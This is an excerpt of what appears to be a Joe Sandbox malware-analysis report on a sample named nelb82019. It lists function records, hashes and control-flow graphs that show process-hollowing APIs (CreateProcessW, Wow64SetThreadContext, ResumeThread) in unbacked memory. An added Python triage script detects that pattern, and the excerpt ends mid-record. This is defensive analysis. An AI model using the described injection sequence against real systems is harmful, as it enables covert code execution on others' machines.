                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00243E47
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 68cd69e806e27b462f15293ca8c6ed492c5995d6d841facb955055373f8cd43a
                                                                                • Instruction ID: 3ddbeb493cadde4447276d8762f261fdafe4fec9c81b029aa30fb44d189c732d
                                                                                • Opcode Fuzzy Hash: 68cd69e806e27b462f15293ca8c6ed492c5995d6d841facb955055373f8cd43a
                                                                                • Instruction Fuzzy Hash: D541CBB5D012189FCB14CFAAD884AEEFBF1BF49314F24842AE404B7200D738AA49CF54

                                                                                Control-flow Graph

                                                                                control_flow_graph 1055 243d98-243df8 1057 243e0f-243e57 Wow64SetThreadContext 1055->1057 1058 243dfa-243e0c 1055->1058 1060 243e60-243eac 1057->1060 1061 243e59-243e5f 1057->1061 1058->1057 1061->1060
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00243E47
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 58298f0ceb02356585628daae36302fa3ae09f565c4ede60c7bccd4bf7feaa06
                                                                                • Instruction ID: 2768368b88a5de6db58a5a8ff78ca0bf066aeaf8c33bf2dedb31e54fdb68906b
                                                                                • Opcode Fuzzy Hash: 58298f0ceb02356585628daae36302fa3ae09f565c4ede60c7bccd4bf7feaa06
                                                                                • Instruction Fuzzy Hash: 9731BAB5D112589FCF14CFAAD884AEEFBF1AF49314F24842AE414B7240C778AA49CF54

                                                                                Control-flow Graph

                                                                                control_flow_graph 1066 244fe3-244ffc CreateProcessW 1067 245005-2450c4 1066->1067 1068 244ffe-245004 1066->1068 1078 2450c6-2450ef 1067->1078 1079 2450fa-245105 1067->1079 1068->1067 1078->1079
                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00244FE9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 90476b4a926e40a41f298359e56bf4ed20e8d231fc71f85fbe057fae88f97cdb
                                                                                • Instruction ID: c5a2f1b6a53fbb83abe198da6d3fabe85c1264a13cc90c6c1bb6fcf6bcad8030
                                                                                • Opcode Fuzzy Hash: 90476b4a926e40a41f298359e56bf4ed20e8d231fc71f85fbe057fae88f97cdb
                                                                                • Instruction Fuzzy Hash: 58213970800229CBEB65DF68C950BDEBBB1AF01304F2091EAC10DB7261DA749E89CF61

                                                                                Control-flow Graph

                                                                                ResumeThread function at 244130 (basic blocks as id: range; edges as from->to):
                                                                                • 1083: 244130-2441c6 ResumeThread
                                                                                • 1087: 2441cf-244211
                                                                                • 1088: 2441c8-2441ce
                                                                                • edges: 1083->1087, 1083->1088, 1088->1087
                                                                                APIs
                                                                                • ResumeThread.KERNELBASE(?), ref: 002441B6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 5d2370956d0eaab5f0c2c1371cad16eb07a455eef152a2d8dc93675d8ebd5261
                                                                                • Instruction ID: 8c25e5f7dafd2e2d1187601172333cb813cbede71f9ea867e2950f32bfd54fea
                                                                                • Opcode Fuzzy Hash: 5d2370956d0eaab5f0c2c1371cad16eb07a455eef152a2d8dc93675d8ebd5261
                                                                                • Instruction Fuzzy Hash: 1D31BCB4D102189FCF14CFA9D984AAEFBB5EF49314F14942AE819B7310C734A945CF54
                                                                                APIs
                                                                                • ResumeThread.KERNELBASE(?), ref: 002441B6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 59ff2710d2b37c0dd7604545a2c28b0e50d9eec6c8b59f275edbf200fb774597
                                                                                • Instruction ID: f160efdf565add8c84bd0d1fea6bd85c1d160b87602071c7c818cc64c204edf3
                                                                                • Opcode Fuzzy Hash: 59ff2710d2b37c0dd7604545a2c28b0e50d9eec6c8b59f275edbf200fb774597
                                                                                • Instruction Fuzzy Hash: 9631CCB4D102189FCF14CFA9E884AAEFBB5AF49314F10942AE819B7300C734A945CF94
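                                                                                Added triage example, not part of the Joe Sandbox report or its tooling: a Python script that reads function records in the format shown above, groups them by process and memory region, and flags a region that is not backed by a PE image yet contains both CreateProcessW and ResumeThread, which is what the records for process 10 at 0x240000 show. The three records in SAMPLE are constructed from lines on this page and separated by blank lines for parsing; reading the fifth dotted field of the .sdmp name as a page-protection value (0x40 = PAGE_EXECUTE_READWRITE) is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample: the "APIs" and "Source File" lines of three function
# records copied from this report (two from process 10, region 0x240000;
# one from process 11, region 0x900000), separated by blank lines so the
# parser below can split them. Not the full report.
SAMPLE = """\
APIs
• CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00244FE9
Memory Dump Source
• Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

APIs
• ResumeThread.KERNELBASE(?), ref: 002441B6
Memory Dump Source
• Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

APIs
Memory Dump Source
• Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
"""

# "• Name.MODULE(args), ref: ADDR"
API_RE = re.compile(r"^\W*(\w+)\.(\w+)\(.*?\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")
# "Source File: <proc>.<stage>.<seq>.<base>.<protect>.<x>.<y>.<z>.sdmp, Offset: ..., based on PE: ..."
SRC_RE = re.compile(
    r"Source File:\s*([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.\d+\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})(?:\.[0-9A-Fa-f]{8}){3}\.sdmp,\s*Offset:\s*([0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(true|false)"
)

# The first field of the .sdmp name is the process index and the fourth is the
# dump base; both match the snapshot names on the page
# (hcaresult_10_2_240000 <-> 0000000A ... 0000000000240000). Assumption: the
# fifth field is the page protection, so 0x40 is PAGE_EXECUTE_READWRITE.
PAGE_EXECUTE_READWRITE = 0x40

# Seen together in one unbacked region, these two calls are the spawn-then-
# release half of a process-hollowing sequence.
HOLLOWING_PAIR = {"CreateProcessW", "ResumeThread"}


def parse_records(text):
    """Yield one dict per function record: its API calls and the dump it came from."""
    for chunk in re.split(r"\n\s*\n", text.strip()):
        rec = {"apis": []}
        for line in chunk.splitlines():
            m = API_RE.match(line)
            if m:
                rec["apis"].append((m.group(1), m.group(2), int(m.group(3), 16)))
                continue
            m = SRC_RE.search(line)
            if m:
                rec["process"] = int(m.group(1), 16)   # 0000000A -> process 10
                rec["stage"] = int(m.group(2), 16)
                rec["dump_base"] = int(m.group(3), 16)
                rec["protect"] = int(m.group(4), 16)
                rec["region"] = int(m.group(5), 16)    # the "Offset:" value
                rec["pe_backed"] = m.group(6) == "true"
        if "region" in rec:
            yield rec


def triage(text):
    """Group records by (process, region); return the regions that are not
    PE-backed and contain the CreateProcessW/ResumeThread pair."""
    regions = defaultdict(lambda: {"apis": set(), "pe_backed": True, "protect": 0})
    for rec in parse_records(text):
        r = regions[(rec["process"], rec["region"])]
        r["apis"].update(name for name, _, _ in rec["apis"])
        r["pe_backed"] = rec["pe_backed"]
        r["protect"] = rec["protect"]
    findings = []
    for (proc, region), r in sorted(regions.items()):
        if r["pe_backed"] or not HOLLOWING_PAIR <= r["apis"]:
            continue
        reasons = ["code is not backed by a PE image",
                   "CreateProcessW and ResumeThread live in the same region"]
        if r["protect"] == PAGE_EXECUTE_READWRITE:
            reasons.append("region is PAGE_EXECUTE_READWRITE (assumed field meaning)")
        findings.append({"process": proc, "region": region,
                         "apis": sorted(r["apis"]), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"process {f['process']} region 0x{f['region']:08X}: {', '.join(f['apis'])}")
        for why in f["reasons"]:
            print("  -", why)
```

                                                                                Run against the sample it reports only process 10's region at 0x240000; the PE-backed region in process 11 is ignored even though it is also marked 0x40. The pair check is deliberately narrow: the WriteProcessMemory/SetThreadContext steps that sit between the spawn and the resume are not listed in these records, so a wider ruleset should be fed the whole report rather than these two functions.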
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400372671.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_13d000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 67d6b7a54f5ad6bd5d00deb8669858e725b9db8a3e2d2df6a1554c1b6a6ede0a
                                                                                • Instruction ID: 6f8c567f066d3c175ab71428506efd877258320f7dab4185b0fa066874534223
                                                                                • Opcode Fuzzy Hash: 67d6b7a54f5ad6bd5d00deb8669858e725b9db8a3e2d2df6a1554c1b6a6ede0a
                                                                                • Instruction Fuzzy Hash: AF21FFB5604340EFDB05CF24F8C4B26BBA5EB84314F24C9A9E8094B246C376D84ACBA1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400372671.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_13d000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5bac1f1d1689a2ef3b0582937e6aeb3e2dc750e4a8c24c5729f060c24c9b42c2
                                                                                • Instruction ID: 4d967bc66fc9d1a25c83f1b7f0c5bf5a08a76d64203610675017b6464fe62645
                                                                                • Opcode Fuzzy Hash: 5bac1f1d1689a2ef3b0582937e6aeb3e2dc750e4a8c24c5729f060c24c9b42c2
                                                                                • Instruction Fuzzy Hash: 8721B0B5604240EFDB19CF24F8C4B26BB65EB84B14F34C5A9E8494B256C736D84BCBA1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400372671.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_13d000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a32f609addacb6cb4880d38ae249acf73ab1d62877314c61fc5c2e4b01bb647b
                                                                                • Instruction ID: c93a144368a3656922636856f90339f43b112a12ea4bafa1108d28c1e8bd612a
                                                                                • Opcode Fuzzy Hash: a32f609addacb6cb4880d38ae249acf73ab1d62877314c61fc5c2e4b01bb647b
                                                                                • Instruction Fuzzy Hash: 502171755083809FCB06CF14E994711BF71EB46714F28C5DAD8498F266C33AD85ACB62
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400372671.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_13d000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                                • Instruction ID: 0037e1be801d687b0eeef2467f8055ee626e754beee274f268e722d8135f06d1
                                                                                • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                                • Instruction Fuzzy Hash: E9119D75504280DFDB02CF54E5C4B16BFA1FB84314F28C6AED8494B656C33AD85ACBA1

                                                                                Execution Graph

                                                                                Execution Coverage:0.3%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:33.3%
                                                                                Total number of Nodes:6
                                                                                Total number of Limit Nodes:1
                                                                                Execution graph nodes (id: address, symbol; edges as from->to):
                                                                                • 65634: 976c39
                                                                                • 65635: 976c45 __except1
                                                                                • 65637: 97ee06 __ultow_s
                                                                                • 65639: 91fea0 LdrInitializeThunk
                                                                                • 65638: 976c66 __except1
                                                                                • 65640: 91f900 LdrInitializeThunk (not connected in the rendered graph)
                                                                                • edges: 65634->65635, 65635->65637, 65635->65639, 65639->65638
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

                                                                                Control-flow Graph

                                                                                Single basic block 13: 920048-92005d LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

                                                                                Control-flow Graph

                                                                                Single basic block 14: 920078-920090 LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

                                                                                Control-flow Graph

                                                                                Single basic block 1: 91f9f0-91fa05 LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

                                                                                Control-flow Graph

                                                                                Single basic block 0: 91f900-91f918 LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

                                                                                Control-flow Graph

                                                                                Single basic block 2: 91fad0-91fae5 LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Control-flow Graph 3: 91fae8-91fafd LdrInitializeThunk [graph image not reproduced]
APIs
Memory Dump Source
• Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
• Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
• Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
• Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Control-flow Graph 5: 91fbb8-91fbcd LdrInitializeThunk [graph image not reproduced]
APIs
Memory Dump Source
• Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
• Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
• Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
• Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Control-flow Graph 4: 91fb68-91fb7d LdrInitializeThunk [graph image not reproduced]
APIs
Memory Dump Source
• Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
• Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
• Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
• Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Control-flow Graph 7: 91fc90-91fca5 LdrInitializeThunk [graph image not reproduced]
APIs
Memory Dump Source
• Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
Similarity
